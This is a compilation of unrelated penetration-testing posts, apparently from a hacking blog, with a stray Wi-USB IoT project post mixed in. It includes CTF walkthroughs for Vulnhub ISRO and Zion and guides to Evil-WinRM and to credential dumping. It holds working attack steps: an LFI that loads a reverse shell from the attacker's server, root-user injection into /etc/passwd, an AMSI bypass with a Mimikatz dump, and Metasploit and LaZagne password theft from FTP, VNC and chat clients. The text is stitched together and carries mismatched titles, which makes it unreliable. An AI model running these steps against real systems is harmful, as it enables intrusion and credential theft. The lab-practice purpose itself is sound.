HA: ISRO Vulnhub Walkthrough

Today we are going to solve our CTF challenge called “HA: Infinity Stones” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find 4 Flags on the victim’s machine.

Penetration Methodologies

• Scanning Network
  • Netdiscover
  • Nmap
• Enumeration
  • Browsing HTTP Service
  • Performing Directory Bruteforce
• Exploitation
  • LFI
  • Create PHP reverse shell
  • Reading /etc/passwd file
  • Getting a reverse connection
  • Spawning a TTY Shell
• Privilege Escalation
  • Writable etc/passwd File

Walkthrough

Scanning Network

Firsts of all we try to identify our target and for this use the following command:

netdiscover

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.1.104

Enumeration

With the help of help scan, we now know that port number 22, 80 are open with the service of SSH, HTTP respectively. Now that port 80 is open we open the target IP address in our browser as shown in the following image:

http://192.168.1.104

It opened a webpage as shown in the above image. Here we found the Bhaskara page, so now we opened and found an information webpage there as shown in the image below:

http://192.168.1.104/bhaskara.html

As a convention, we will enumerate the webpage by going through the source code. We see that we have the Bhaskara Launch Code. This seems a base64 encoded text.

Now we got to decode it. To do this we will be using the combination of the echo command and the base64 -d.

echo "L2JoYXNrYXJh" 1 base64 -d

After decoding the base64 encoded text we get “/bhaskara”. This seems a hint that there might be a directory named bhaskara.

So, we went on to our browser in order to browse the bhaskara directory. We see that a file is downloaded when we browse the URL. This is a 2MB file. After enumerating the file, we came to realize that it is a TrueCrypt file.

Now in order to crack this file, we are going to use extract its hash using the true.py. You can download the true.py from this link. We named the file as true.py and ran it and it gave us the password as xavier.

python true.py bhaskara > hashes
john hashes --show

Now as we knew it was a TrueCrypt file. That means it might be hiding something inside it. So, we tried to open it using VeraCrypt by providing it path and selecting a volume as shown in the given image. 

Upon mounting the TrueCrypt file on a slot, we are asked to enter the password. We enter the password that we found earlier i.e. ‘xavier’ 

 It opened up to show a text file labelled ‘flag.txt’. We opened it; it gave us our first flag. Bhaskara Flag.

Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}

Now let’s move forward in Enumeration. We also performed a directory scan. This gave us an /img directory. We performed an extension directory scan. It gave us a connect.php.

dirb http://192.168.1.104
dirb http://192.168.1.104 -X .php

We went into the /img directory. Here we found an image called aryabhata.jpg.

We will download the aryabhata.jpg and opened it.  

Upon opening it we found it to be the poster for Aryabhata satellite as shown in the image given below.

As we couldn’t find anything specific with the image, we suspected that there is some steganography involved. Hence, we decided to use the Steghide tool to extract anything that might be hidden in the image. We saw that there is a text file named flag.txt hidden inside it. On opening it we found the Aryabhata flag. 

steghide extract -sf aryabhata.jpg
cat flag.txt

Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation

Back to the Web Browser, we also found a connect.php in our drib directory bruteforce. This gave us nothing. Then we realized that this can be command injection. Now to test we tried opening the etc/passwd file through it. As seen in the image given below, we see that it’s a File Inclusion Vulnerability.

192.168.1.104/connect.php?file=/etc/passwd

We edited our shell.php, to enter the attacker machine IP address. And then closed the file after saving it. Now we need to send this to the target machine. Hence, we started a python http server using the one-liner showed below.

nano shell.php
python -m SimpleHTTPServer

We are gonna capture a reverse connection using the netcat. So we need to initiate a listener on the port mentioned in the shell file.

nc -lvp 1234

After starting the listener on the target machine, we will run the shell on the target machine using the File Inclusion Vulnerability.

192.168.1.104/connect.php?file=http://192.168.1.103:8000/shell.php

Upon execution, the shell gave us a session to the target machine. As seen in the image given below, it wasn’t a proper shell. So, we needed a python one liner to convert it into a proper shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We used netstat command to check for the IP address and ports the target machine is listening on and found that a web service (3306) is allowed for localhost only. The most common service to run on the port 3306 is MySQL. Let’s enumerate in that direction.

netstat -antp

We tried to login in the MySQL database as the root user. After logging in the MySQL, we enumerated the databases. Here we found a database named ‘flag’. We looked inside the tables of flag database. Here we found our second flag Mangalyaan Flag.

mysql -u root 
show databases;
use flag;
show tables;
select * from flag;

Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation

As a part of our Enumeration for Escalating Privilege on the target machine, we try to find if the /etc/passwd is writable. We can see that the file is, in fact, writable. This is our way to move forward.

ls -la /etc/passwd

Now we going to need the password hash for the user that we are going to create on the target machine by making an entry in the /etc/passwd file. We are going to use the openssl to generate a salted hash.

openssl passwd -1 -salt user3 pass123

Now back to our remote shell on the target machine. Here we are going to use the hash that we generated in the previous step and make a user raj which has the elevated privilege. We used the echo command to make an entry in the /etc/passwd file. After making an entry we checked the entry using the tail command. Now, all we got to do is run su command with the user name we just created and enter the password and we have the root shell. We traversed inside the root directory to find our final flag, Chandrayaan Flag.

echo 'raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash' >>/etc/passwd
tail /etc/passwd
su raj
Password: pass123
cd /root
ls
cat final.txt

Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2} 

Evil-Winrm : Winrm Pentesting Framework

In this post, we will discuss the most famous framework for PS Remote shell hacking tool named as “Evil-Winrm”. It is an opensource tool which is available on GitHub for winrm penetration testing.

Table of Content

• Evil-winrm
• Features
• Installation
• Load PowerShell scripts
• Pass the Hash
• Install using its Docker image

Evil-winrm

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but most of its features are focused on hacking/pentesting stuff.

Features

• Compatible to Linux and Windows client systems
• Load in memory Powershell scripts
• Load in memory dll files bypassing some AVs
• Load in memory C# (C Sharp) assemblies bypassing some AVs
• Load x64 payloads generated with awesome donut technique
• AMSI Bypass
• Pass-the-hash support
• Kerberos auth support
• SSL and certificates support
• Upload and download files showing a progress bar
• List remote machine services without privileges
• Command History
• WinRM command completion
• Local files completion
• Colorization on prompt and output messages (can be disabled optionally)
• Docker support (prebuilt images available at Dockerhub)
• Trap capturing to avoid accidental shell exit on Ctrl+C

Installation 

In the post, we have discussed two easy methods to install winrm in your Kali Linux, you will find more method for installation from GitHub.

With the help of Ruby gem, you can directly install the evil-winrm, it will automatically install all dependency in your machine by executing following command.

gem install evil-winrm

once it will get installed you can pull its HELP option by typing ‘evil-winrm’ that will display the syntax and other operators for executing evil-winrm against windows remote management service.

Now using evil-winrm we try to access remote machine shell by connecting through port 5985 open for winrm. As a result, it will give the access of victim shell by providing its Powershell as given below.

Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’>

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'

It will not only provide a shell of the host machine but also provide a menu to load function such as Invoke-Binary, Dll-Loader, Donut-Loader and Bypass-4MSI.

Load PowerShell scripts

So we have some pen testing powershell script in the /root/powershell and we can upload this ps1 script through evil winrm on the host machine.

The .PS1 scripts must be in the path set at -s argument and execute this as given below:

Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’> -s <path>

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987' -s /root/powershell

Type menu again and see the loaded functions and use Bypass 4MSI then Invoke the script. Here we have tried to upload mimikatz PowerShell script to dump stored credential.

menu
Bypass 4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz

As a result, it has dumped all the credential of the Windows Server. 

Pass the Hash

It has one more feature which allows you to conduct Pass the HASH attack and as a result it gives the shell of the host machine.

Install using its Docker image

This is a very easy and convenient method to install winrm on your attacking machine and simultaneously provide the shell of the victim machine by compromising it winrm service. Only you need to execute the following command.

docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'

+------------------------------------------------- This is only an educational purposes only I am not responsible for further activities Join my forum and learn more ethical hacking and penetration testing https://t.me/WhiteHatHacks Get me at alex14324.blogspot.com https://t.me/alex14324 https://github.com/alex14324 https://discord.gg/6NPtGxZ
-------------------------------------------------------+

Zion Vulnhub Walkthrough

Today, I am going to share a writeup for the boot2root challenge of the Vulnhub machine “Zion”. It was actually an intermediate box based on the Linux machine. The goal for this machine is to read the flag.txt file.

Penetration Testing Methodology

• Network Scanning
  • Netdiscover scan
  • Nmap Scan
• Enumeration
  • Enumerating HTTP service on Browser
  • Inspecting the Login Panel using BurpSuite
  • Decoding Base64 and Base62 messages
• Exploitation
  • Crafting the Dictionary using Cewl
  • Bruteforcing using BurpSuite
  • Enumerating the Web Application
• Post Exploitation
  • Connecting using SSH
  • Enumerating for Sudo Rights
• Privilege Escalation
  • Abusing Sudo Rights on cp

Walkthrough

Network Scanning

We begin by scanning our network for the target machine using Netdiscover. The target machine is active on 192.168.1.109. Let’s scan it and see which services are running and which ports are open.

We do an aggressive scan on the target using nmap.

nmap -p- -A 192.168.1.109

Enumeration

The scan gives us a lot of good and useful information, but what stands out the most is that port 22 and 80 are open, let’s explore port 80 first and see what we can find there.

Here we see that we have 2 buttons, The “Truth” and “Illusion”. We are given the choice for the Red Pill and Blue Pill similar situation as Neo faced in the Matrix Trilogy by Morpheus. Clicking on the Truth button, we get to a login page.

After looking around the login panel for some time, I decided to inspect the panel through the BurpSuite. I captured the request in the BurpSuite. Sent the request to the Repeater. Here, upon checking the response of the request, we see that there are some odd parameters containing values that seem to be encrypted.

Guessing that the encryption might be Base64, I decided to decode the banner value using the Decoder. This gave us a message that tells us to “Open our mind”. Also it tells us to avoid some characters.

This means that the message that was left to us is not exactly Base64. If we avoid the characters mentioned in the message we get the encryption that is Base62. So, let’s try to decrypt the message using a Base62 decrypter. You can find one online.

The message that was decoded was that it is giving us the hints for the credentials for the “Zion’s Systems”. It tells us to look at the choice page that we were on few moments before. Also, it gives us the username for the user “morpheus.thematrix”. It also tells us that the user likes to keep simple passwords.

Exploitation

There are multiple methods as to how we can try to get the passwords. We can try manually but when we have an arsenal of tools that can do this for us why waste the time. I decided to create a dictionary that can be used to bruteforce the login using cewl. Using cewl is quite simple, we need to provide the URL and the output file path. Cewl will run and create a dictionary for  all the words that are on the webpage.

cewl http://192.168.1.109/ -w dict.txt

Now for the brute force, we decide to use the BurpSuite’s Intruder Module. To use Intruder, we need capture the request at the “Login” button with some sample text inside the password box.

Now that we have the request, we can use it to brute force the login using the Intruder. I gave the sample text as “test”. We can send the request to Intruder using the shortcut “Ctrl + I”.

After sending the request to Intruder, we go to the Positions Tab. Here we select the Attack type as Sniper. After setting the Attack type we need to specify the Payload Positions. This is the particular text that is going to be brute-forced. Here we want to brute force the password parameter. So we select the “test” as a place holder. Add the “§” symbol around the text as shown in the image given below by clicking the “Add §” button.

Next, we moved onto the Payloads Tab. Here we have multiple sections to provide the type of payload we want to provide for the bruteforce. Payload here means the dictionary that we created using Cewl previously. We need to provide the Simple list in the Payload type option under the Payload Sets section. Next, we need to add the contents of the dictionary we created. For this we will use the Load button in the Payload Options section. This will open up a window where we can browse the dictionary we created. After doing the above steps we click on the Start attack button.

Clicking on the Start attack button opens up a yet other windows where we can see the Burp Suite try multiple requests from the dictionary. We see that we get a redirection from the password interpreted. This could mean that this is the password. Time to check it out.

We go back to the Login Panel, and try the following credentials to login.

Username: morpheus.thematrix
Password: interpreted

This opens up the Zion’s System. Here we see some information about the user w.rabbit . It tells that the user w.rabbit has forgotten his password. So, the Administrator has disabled its logins using the password. But he did something related to the movies. Matrix, I suppose. Also, I see that there is a link for Private key in the top right sections as shown in the image given below.

The link leads us to a page called rabbit-hole/rsa_priv_key_for_w.rabbit.txt. This is a private key for the user w.rabbit. This means we can login into SSH using this user.

Post Exploitation

I copied the contents of the key and saved it into a empty file and save it as “key”. Now, since we have the port 22 open on the Target Machine, we will try to login on SSH using this key.  From some enumeration we find the warning.txt file. Here we see that we have to find the flag in the path mentioned. We are given the freedom to choose any method or technique we want. Enumerating further into the mail directory, I found the credentials for the user w.rabbit. We are already logged in as w.rabbit user but with the password we can run process as user w.rabbit. To find out what services we can run with elevated permissions. We can see that cp command can be run with elevated privileges as user dozer.

ssh -i key w.rabbit@192.168.1.109
cat warning.txt
cat w.rabbit.txt
sudo -l

This means that we can run the cp command without any password or other verification.

Privilege Escalation

In the above step we got the that we can access /bin/cp as sudo for both w.rabbit and dozer and in the process of enumeration we got the sudo password for the w.rabbit. So, let’s try to use the /bin/cp file to escalate to the dozer using /bin/sudo. Using cp i.e copy command we will copy the flag.txt in the tmp folder to display the flag.txt using below command.

/bin/sudo -u dozer /bin/cp --no-preserve=mode,ownership /home/dozer/flag.txt /tmp/flag.txt
cat flag.txt

Here we got our /home/dozer/flag.txt. So that’s for now. See you next time

+------------------------------------------------- This is only an educational purposes only I am not responsible for further activities Join my forum and learn more ethical hacking and penetration testing https://t.me/WhiteHatHacks Get me at alex14324.blogspot.com https://t.me/alex14324 https://github.com/alex14324 https://discord.gg/6NPtGxZ -------------------------------------------------------+

Protect Your USB ports from USB killer with Wi-USB

For Wireless USB for Instant IoT

Short explanation:

This is a device that allows you to connect almost any USB device to your computer....without a USB cable. It uses a USB message to IP message wrapper and creates a simple virtual COM port on your PC. This device is a true USB host and you can use it to make almost any USB device instantly wireless. 

It works very reliably (as long as your wifi signal strength not poor), and seems to be the quickest way to get a project both wireless and on the internet.

Long explanation:

Imagine if you will: You have an Arduino connected to your PC via good old USB. THEN....you cut that USB cable in half, and attach an antenna to either cable stump. Then, you move the Arduino further away from your computer, maybe you even move it to the other side of house.

You click "Upload" in the Arduino IDE and voila!...the sketch uploads successfully. If your sketch has the Arduino writing over serial, you can even open the serial monitor and your data comes through, no problem.

Oh you don't use Arduinos? Okay, maybe you use a USB webcam, or a USB-controlled 3D printer, a normal printer, a USB nerf turret...or even some other fancy new microcontroller. Either way, it is now totally wireless, and you didn't need to write (or even copy and paste) a single line of code.

That's what I wanted, and, as is typical for me, what pretty much didn't exist. 

So I did it myself!

Here is how it works: The Linux Single-Board-Computer (SBC) inside the 3D printed case has a "USB host" port, which basically means it can have slave devices (arduinos, flash drives, 3D printers, etc) connect to it. Your PC has lots of host ports, whereas your Arduino has none. That's why you can't connect two Arduinos together via USB (not without a host shield at least, and even then, you'd need drivers!).

SO, we have a USB host port. That's the first step in the right direction. Now, we need the Linux SBC to be connected to your home wireless network. Let's skip the details for now, but take my word for it...that part is easy. Great, now our Linux SBC is on your wifi!

Then, we connect something...(let's say an Arduino for now, as an example)...to the USB host port on the Linux SBC.

This is when the Linux SBC starts doing something sneaky, and clever. It reads the USB messages zooming to and from your Arduino, and uses a "USB/IP" protocol to wrap those messages up into little IP messages. Now, these IP messages (secretly USB messages), get sent over your network back to your PC. Your PC is running some nice software that knows how to convert these IP messages BACK into USB messages. It feeds these USB messages into a "Virtual USB port", which is basically a real USB port, as far as your PC is concerned.

After that, you're good to go - Device Manager will show that an Arduino is connected on COM-XYZ. Fire up the Arduino IDE and upload a sketch, it works, no problem. From here on out, the system behaves as if you are connected directly via USB....but you know better. The little bugger is actually all the way upstairs, tending to your automated houseplant watering system. 

Side rant about why I went down this track:

Now that it is the year 2017, it seems like every project is supposed to be an "IoT" project of some kind.

I've done my fair share of ESP8266 projects, but as a relatively weak coder, it usually ends up slowing me down a LOT when it comes time to code up a little nodejs page or parsing some long string of data from one or more sensors.

The last ten years has seen a literal revolution in accessibility to powerful tools for hobbyists and engineers, but connecting stuff to the internet (or just being wireless in any sense) continues to be a challenge if you aren't a strong programmer. Admittedly, the learning curve is better than it has ever been, but I am spoiled and I want to connect my projects to the internet in...a minute.....and have it be over with and just work.

There are some pretty great products out there now (and even greater community support and how-to articles!) but I still feel like there is a little gap when it comes to INSTANT IoT. That's why I did this project, and I hope that some people in this community will like it!

Credential Dumping: Applications

The Credential Dumping series. In this article, we will learn how we can dump the credentials from various applications such as CoreFTP, FileZilla, WinSCP, Putty, etc.

Table of Content:

• PowerShell Empire: Session Gropher
• Credential Dumping: CoreFTP
  • Metasploit Framework
• Credential Dumping: FTP Navigator
  • Metasploit Framework
  • Lazagne
• Credential Dumping: FileZilla
  • Metasploit Framework
• Credential Dumping: HeidiSQL
  • Metasploit Framework
• Credential Dumping: Emails
  • Mail Pass View
• Credential Dumping: Pidgin
  • Metasploit Framework
• Credential Dumping: PSI
  • LaZagne
• Credential Dumping: PST
  • PST Password
• Credential Dumping: VNC
  • Metasploit Framework
• Credential Dumping: WinSCP
  • LaZagne
  • Metasploit Framework

PowerShell Empire

Empire provides us with a with a module that allows us to retrieve the saved credentials from various applications such as PuTTY, WinSCP, etc. it automatically finds passwords and dumps them for you with requiring you to do anything. Once you have your session in the empire, use the following commands to execute the module:

usemodule credentials/sessiongopher
execute

And as you can see in the image above and below, it successfully retrieves passwords of WinSCP, PuTTy.

Now we will focus on fewer applications and see how we can retrieve their passwords. We will go onto the applications one by one. Let’s get going!

CoreFTP: Metasploit Framework

Core FTP server tool is made especailly for windows. It lets you send and receive files over the network. for this transfer of files, it used FTP protocol which makes it relatively easy to use irrelevant of the Operating System.

With the help of metasploit we can dump the credentials saved in the registry from the target system, the location the passwords is HKEY_CURRENT_USER\SOFTWARE\FTPWare\CoreFTP\Sites. You can run the post-module after you have a session and run it, type:

use post/windows/gather/credentials/coreftp
set session 1
exploit

FTP Navigator: LaZagne

Just like Core FTP, FTP navigator is FTP client that make transfer, editing, renaming of files easy over the network. it also allows you to keep the directories in sync for both local and remote users. When using the command lazagne.exe all and you will have the FTPNavigator as shown below:

FTPNavigator: Metasploit Framework

The credentials of FTPNavigator can also be dumped using Metasploit as there is an in-built exploit for it. To use this post exploit, type:

use post/windows/gather/credetnials/ftpnavigator
set session 1
exploit

As you can see in the image above, as expected we have the credentials.

FileZilla: Metasploit Framework

FileZilla is another open-source client/server software that runs on FTP protocol. it is compatible with windows, Linux and MacOS. it is again used for transfer or editing or replacing the files in a network. We can dump its credentials using Metasploit and to do so, type:

use post/multi/gather/filezilla_client_cred
set session 1
exploit

And so, we have successfully retrieved the credentials

HeidiSQL: Metasploit Framework

It is an open-source tool for MySQL, MsSQL, PostgreSQL, SQLite. Numerous sessions with connections can be saved along with the credentials, when using HeidiSQL. it also lets you run multiple sessions in a single window. managing od database is pretty easy if using this software. Again, using Metasploit we can get our hands on it credentials by using the following post exploit:

use post/windows/gather/creddtnitals/heidisql
set session 1
exploit

Email: Mail PassView

All the email passwords that are stored in the system can retrieved with the help of the tool named Mail PassView. This tool is developed by nirsoft and is best suited for internal pentesting. Simple download the software from here. Launch the tool to get the credentials as shown below:

Pidgin: Metasploit Framework

Pidgin is an instant messaging software that allows you to chat with multiple networks. It is compatible with every Operating System. it also allows you to transfer files. There is a in-built post exploit for pidgin, in Metasploit, too. To initiate this exploit, use the following commands:

use post/multi/gather/pidgin_cred
set session 1
execute

And all the credentials will be on your screen.

PSI: LaZagne

PSI is an instant messenger that works over XMPP network. it also allows you to transfer files. it is highly customizable and comes in various languages. Using lazagne.exe chat command in LaZagne you can dump it’s password as shown in the image below:

PST: PstPassword

Nirsoft provides a tool which lets you retrieve all the PST passwords from Outlook. You can download this tool from here. Simple launch the tool and you will have the passwords as shown below :

VNC: Metasploit Framework

VNC is a remote access software which allows you to access your device from anywhere in the world. VNC passwords can be easily retrieved by using metasploit and to do so, type:

use post/windows/gather/credentials/vnc
set session 2
exploit

WinSCP: LaZagne

WinSCP is FTP client which is based on SSH protocol from PuTTY. It has a graphical interface and can be operated in multiple languages. it also acts as a remote editor. Both LaZagne and Metasploit helps us to retrieve it’s passwords. In LaZagne, use the command lazagne.exe all and it will dump the credentials as shown in the image below:

WinSCP: Metasploit Framework

To retrieve the credentials from Metasploit, use the following exploit:

use post/windows/gather/credentials/winscp
set session 1
exploit

This way, you can retrieve credentials of multiple applications.